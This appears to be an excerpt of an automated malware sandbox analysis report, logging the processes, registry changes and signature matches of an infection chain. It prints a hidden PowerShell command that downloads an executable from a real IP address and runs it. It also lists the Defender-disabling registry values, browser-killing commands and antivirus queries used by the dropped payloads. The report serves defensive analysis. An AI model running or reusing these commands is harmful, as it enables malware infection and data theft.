                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00960B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,34_2_00960B62
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe Code function: 34_2_00961663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,34_2_00961663
                      Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: c6e8248d4e.exe Binary or memory string: Shell_TrayWnd
                      Source: rapes.exe, rapes.exe, 0000001C.00000002.2112228521.0000000000625000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: `'Program Manager
                      Source: ab5415a7b5.exe, 00000035.00000002.2095590801.0000000000EF1000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: ?*lProgram Manager
                      Source: bb5ad48269.exe, 00000036.00000002.1990503385.0000000001286000.00000040.00000001.01000000.00000013.sdmp Binary or memory string: hProgram Manager
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 28_2_00459AB5 cpuid 28_2_00459AB5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128590121\am_no.cmd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10128590121\am_no.cmd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\spoolsv.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 28_2_004593A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,28_2_004593A7
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 28_2_004361F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegOpenKeyExA,RegEnumValueA,DeleteObject,DeleteObject,DeleteObject,LookupAccountNameA,28_2_004361F0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe Code function: 34_2_0093B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,34_2_0093B952
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe Code function: 34_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,34_2_009042DE
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe Registry value created: TamperProtection 0
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                      Source: 19be97887a.exe, 0000001E.00000003.1888188996.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1867412739.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1867210058.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1867210058.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1869981140.0000000000D77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Windows\System32\spoolsv.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara match File source: 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara match File source: 00000014.00000002.1028077488.0000000000431000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: 00000012.00000003.967837133.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001C.00000002.2109764248.0000000000431000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: 00000012.00000002.1009481063.0000000000301000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.1010976873.0000000000431000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000003.952949007.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: c6e8248d4e.exe PID: 6080, type: MEMORYSTR
                      Source: Yara match File source: 35.2.19be97887a.exe.e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000036.00000003.1948179949.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000021.00000002.1814440673.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara match File source: 00000021.00000003.1774138990.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
